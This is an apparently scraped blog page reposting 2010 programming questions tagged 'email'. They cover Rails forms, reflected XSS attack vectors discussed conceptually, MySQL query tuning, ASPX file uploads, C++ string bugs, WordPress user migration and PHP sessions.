Posts Tagged ‘email’

How can I have multiple forms to update the same model?

Monday, August 23rd, 2010

I am new to Rails.

I have a User model. I would like a web page that allows users to change their :name and :email, and another web page that allows them to change their password.

Right now, I have a form to edit :name and :email at

/users/1/edit

The form on the page is

<%= form_for(@user) do |f| %>

My routes.rb has

resources :users

This works. Users can edit their :name and :email just fine. How do I now set up another web page with another form that allows them to change their password?

Thank you.

Tags: , ,
Posted in dotnet, vb, vb.net | No Comments »

What are the possible attack vectors for reflected cross site scripting?

Sunday, August 22nd, 2010

Wikipedia provides information about one of the most common scenarios for exploiting a reflected cross site scripting attack – using some degree of social engineering to induce unsuspecting users to click a malicious link:

  1. Alice often visits a particular website, which is hosted by Bob. Bob’s
    website allows Alice to log in with a
    username/password pair and stores
    sensitive data, such as billing
    information.
  2. Mallory observes that Bob’s website contains a reflected XSS
    vulnerability.
  3. Mallory crafts a URL to exploit the vulnerability, and sends Alice an
    email, enticing her to click on a link
    for the URL under false pretenses.
    This URL will point to Bob’s website,
    but will contain Mallory’s malicious
    code, which the website will reflect.
  4. Alice visits the URL provided by Mallory while logged into Bob’s
    website.
  5. The malicious script embedded in the URL executes in Alice’s browser,
    as if it came directly from Bob’s
    server (this is the actual XSS
    vulnerability). The script can be used
    to send Alice’s session cookie to
    Mallory. Mallory can then use the
    session cookie to steal sensitive
    information available to Alice
    (authentication credentials, billing
    info, etc.) without Alice’s knowledge.

Now, this is usually tends to be very good example when the website happens to be a page-driven application – the vulnerability is exploited by getting the user to submit a malicious payload to the application (more importantly, by issuing a GET request when logged in) which is reflected back in the response.

Are there any more interesting attack vectors, especially ones to consider when the application utilizes a lot of AJAX with most of the requests being made over HTTP POST?

EDIT

In case I wasn’t clear, I’d like to know the various types of attacks vectors applicable to reflected XSS attacks, especially when the client-side tier of the application is implemented differently. Page-based applications would have an attack vector involving HTTP GET requests issued from a user, but it would be interesting to know how this plays out for thick client applications especially the ones using XMLHttpRequest objects that issue HTTP POST requests. Different mechanisms used in client-side rendering will obviously warrant study of different attack vectors. In some cases, there might not be any applicable attack vectors; the question is expressed to elicit such a response.

Tags: , , , , , , , , , , , , , , , , , , ,
Posted in dotnet, vb, vb.net | No Comments »

Optimize this query, retrieve users from a MySQL db with 500.000 users and one conditional

Sunday, August 22nd, 2010

Suposse I have the next MySQL database with 500.000 rows:

users
{
    id       - int,
    name     - varchar(32),
    verified - tinyint(1)
}

primary { id }
index   { verified }

And I need to get last 20 not verified users, so I use the next query:

SELECT * FROM users WHERE verified != 1 ORDER BY id DESC LIMIT 20

But it takes 1.2 seconds to complete.

How can I optimize it? Or get the same result with other way in php.

[EDIT]

ID is the primary index, VERIFIED is a index too

[EDIT 2]

CREATE TABLE `users` (
  `id` int(10) unsigned NOT NULL auto_increment COMMENT 'Identificador del usuario',
  `login` varchar(32) NOT NULL COMMENT 'Login para entrar',
  `password` varchar(32) NOT NULL COMMENT 'Password para entrar',
  `email` varchar(384) NOT NULL COMMENT 'Email del usuario',
  `group_id` int(10) unsigned default NULL,
  `display_name` varchar(64) NOT NULL COMMENT 'Nombre para mostrar',
  `email_verified` tinyint(3) unsigned default '0' COMMENT 'Email verificado?',
  `banned` tinyint(3) unsigned default '0' COMMENT 'Baneado?',
  `admin` tinyint(3) unsigned default '0' COMMENT 'Es un super administrador del sitio?',
  `registered` int(10) unsigned NOT NULL COMMENT 'Fecha del registro',
  PRIMARY KEY  (`id`),
  KEY `login` (`login`),
  KEY `password` (`password`),
  KEY `email` (`email`(333)),
  KEY `group_id` (`group_id`),
  KEY `email_verified` (`email_verified`),
  KEY `banned` (`banned`),
  KEY `admin` (`admin`),
  KEY `registered` (`registered`)
) ENGINE=MyISAM AUTO_INCREMENT=500002 DEFAULT CHARSET=utf8;

[EDIT 3]

EXPLAIN(SELECT id FROM users WHERE email_verified != 1 ORDER BY id DESC LIMIT 20)

is

id: 1
select_type: SIMPLE
table: users
type: range
possible_keys: email_verified
key: email_verified
key_len: 2
ref:
rows: 345195
Extra: Using where; Using filesort

And a profile of the query:

Status  Duration
(initialization)    0.0000307
Opening tables  0.000003
System lock 0.0000017
Table lock  0.0000042
init    0.000017
optimizing  0.0000077
statistics  0.000097
preparing   0.000054
executing   0.0000007
Sorting result  1.2321507
Sending data    0.000272
end 0.000004
query end   0.0000025
freeing items   0.0000099
closing tables  0.0000025
logging slow query  0.0000005

Tags: , , , , , , , ,
Posted in dotnet, vb, vb.net | No Comments »

aspx file upload talking to c++ program does not work w/ binary files

Saturday, August 21st, 2010

Hi I have a simple aspx C# script page that uploads a file and some address and sends an email with uploaded file as attachment. This all works fine from a browser, no problem, but that is not what I am trying to do :) .

I am using this control:

       <p> 
       Select File to Send: 
       <input id="File1" 
              type="file" 
              runat="server">
  

       <p> 

       Select File to Send: 

       <input id="File1" 

              type="file" 

              runat="server">

  on the sever part my script goes like this:

<html>

 <head>

 

    <script language="C#" runat="server">

    

   

       void Button1_Click(object Source, EventArgs e) 

       {

 

          if (FromAddr.Value == "") 

          {

             Span1.InnerHtml = "Error: you must enter a Email Addr";

             return;

          }

 

          if (File1.PostedFile.FileName != "") 

          {

            try

            {

              MailMessage aMessage = new MailMessage(FromAddr.Value, ToAddr.Value);

              aMessage.Subject = Subject.Value;

              aMessage.Body = Message.Value;

              // set up the attachment

              ContentType ct = new ContentType(MediaTypeNames.Application.Octet);

              Attachment data = new Attachment(File1.PostedFile.InputStream, ct);

              ContentDisposition disposition = data.ContentDisposition;

              disposition.FileName = AttachName.Value;

              aMessage.Attachments.Add(data);

              SmtpClient client = new SmtpClient("<some host>");

              client.Credentials = CredentialCache.DefaultNetworkCredentials;

              client.Send(aMessage);

              data.Dispose();

              Span1.InnerHtml = "Send Success: ";

            }

            catch (Exception exc)

            {

                Span1.InnerHtml = "Send failure: " + 

                                  ToAddr.Value + "</b><br>" + exc.ToString();

            }

          }

the rub is I want to do this from within a c++ application so I wrote a class to mimic the browser, it pulls down the HTTP get page load. gets the validate ID and state codes and builds up a post message. This works fine with text files but as soon as I try binary it chokes.

It appears to time out waiting for a reply from the server as if it is expecting more data. Does anyone have any ideas? I have been banging my head against this wall for a bit. Thanks!

Tags: , ,
Posted in dotnet, vb, vb.net | No Comments »

anqders on “Move users from E107 CMS to WordPress”

Saturday, August 21st, 2010

Hi Everyone

I currently have around 2200 users on my website running E107, but now I would like to move to WordPress, and it’s up and running on a new site.

..But at the topic says, I would like to get all my users with me, and I have found no scripts to do this for me, so I guess it must be “manually”.

I have a SQL dump off the database, and can see that the E107 table name for the users is “ps3e107_user” where I need to get “user_id”, “user_name”, “user_email” and maybe “user_password”?

What is the best way to accomplish this, and can someone provide me with a script of some sort, and I guide on how to use it?

Tags: , , , ,
Posted in dotnet, vb, vb.net | No Comments »

garbage character at end of string?

Saturday, August 21st, 2010

Hi there I’m reading a string and breaking each word and sorting it into name email and phone number. with the string joe bloggs joeblog@live.com 12345. But once i break everything down, the individual separated variables which hold the name,email and phone number have garbage characters at the end of them. I cant figure out why.

test file

//test file
#include <iostream>
#include <string>
#include "iofunc.h"
using namespace std;
int main(){
    string str1 = "Colin Coghill commando C.Coghill@auckland.ac.nz 84536";

    iofunc func;
    cout<<"|-----------------------getname DEMONSTRATION------------------|n" << endl;
    func.getName(str1);

    cout<<"the names are: " << func.glob_name << endl;

    cout<<"n|-----------------------getphone DEMONSTRATION------------------|n" << endl;
    func.getPhone(str1);
    cout<<"the phone number is:" << func.glob_phone << endl;

    cout<<"n|-----------------------getemail DEMONSTRATION------------------|n" << endl;
    func.getEmail(str1);
    cout<<"the email address is:" << func.glob_email << endl;

    return 0;
}

here’s my get name function, the class is too big to scroll through:)

void iofunc::getName(string arg){
    lineProcess(arg);
    //make sure to call this depending on what function u are using

    int name_count = 0;
    int wspace_count = 0;
    int arg_len = arg.length();
    //int char_len = 0;
    char name_temp[80];

    name_count = numberofNames();
    //line process was called before so this will work,
    //make sure you call line process before using this function

    //for special, condition when there is no space in front of names
    if (special_condition == true){
        int i = 0;
        while(i < arg_len){
            name_temp[i] = arg[i];
            i++;
        }
        glob_name = string(name_temp);

    }

    if (special_condition == false){
        if (name_count == 1){
            int i = 0;
            while (arg[i] != ' '){
                name_temp[i] = arg[i];
                i++;
            }
            glob_name = string(name_temp);
        }

        //for 2 names
        if (name_count == 2){
            for (int i = 0; i < arg_len;i++){
                if (arg[i] == ' '){
                    wspace_count++;
                }
                if (wspace_count !=2){
                    name_temp[i] = arg[i];
                }
            }
            glob_name = string(name_temp);
        }
        //for 3 names
        if (name_count == 3){
            for (int i = 0; i < arg_len;i++){
                if (arg[i] == ' '){
                    wspace_count++;
                }
                if (wspace_count !=3){
                    name_temp[i] = arg[i];
                }
            }
            glob_name = string(name_temp);
        }
    }

}

basic jist of all that is, im using the function called lineProcess to figure out whether there is an email, phone and name in the argument string, And the numberofNames functions gives how many names there are so that I can act accordingly.

I had to use char name_temp to copy just the names from string so that I can extract just that and assign it to the string variable named glob_name. It copies everything i need but it gives me that garbage after each extracted string.

any idea?.

Tags: , , , , ,
Posted in dotnet, vb, vb.net | No Comments »

regisfrey on “Blog Inaccessible from Global Dashboard”

Saturday, August 21st, 2010

My blog http://darkfirestudios.wordpress.com is old (and rarely logged into) but I keep it around to direct to the new blog/site. I just got an email with info on a spam comment ready for moderation but when I reach the dashboard the blog links are nowhere to be found. It acts as though I have no blogs and the links under “My Blog” just point to the dashboard. For default blog the value is N/A.

Tags: , , ,
Posted in dotnet, vb, vb.net | No Comments »

Passing SESSION variables

Saturday, August 21st, 2010

Let’s say I have a questionnaire consisting of three pages that a user is supposed to submit.
I collect variables through SESSION.
Should I pass all the variables in session from page to page repeating them or could I pass variables from page one to page three?
For example, I have ‘first name’ and ‘last name’ on page 1, ‘email’ and ‘address’ on page 2, ‘age’ and ‘occupation’ on page 3.
Could I pass ‘first name’ and ‘last name’ from page 1 directly to page 3?
Or I will have to pass them to page 2 first and then pass them again from page 2 to page 3?

Thank you!

Tags: , , ,
Posted in dotnet, vb, vb.net | No Comments »

Launch CMD File From ASPX Page

Saturday, August 21st, 2010

My organization uses a CMD file to install updated files for a major enterprise application. Currently, we send out an email to users with a link to the file and instructions to run it, BUT inevitably users don't update their machines until their in field and try to start the app.

 

We're now liking the idea of using an ASPX page to prompt the users to run the updates and to capture the fact that the updates have been run. I realize that we can't capture the success or failure of the update. But we'd like to capture the user accessed the page.

 

Is it possible to embed into the markup for the page a link to the file on the local intranet that the users can click on to run the file?

The user accessing the page would capture that they did just that. We'd deal with wether or not the update was actually installed or if it failed later with them directly.

Tags: , ,
Posted in dotnet, vb, vb.net | No Comments »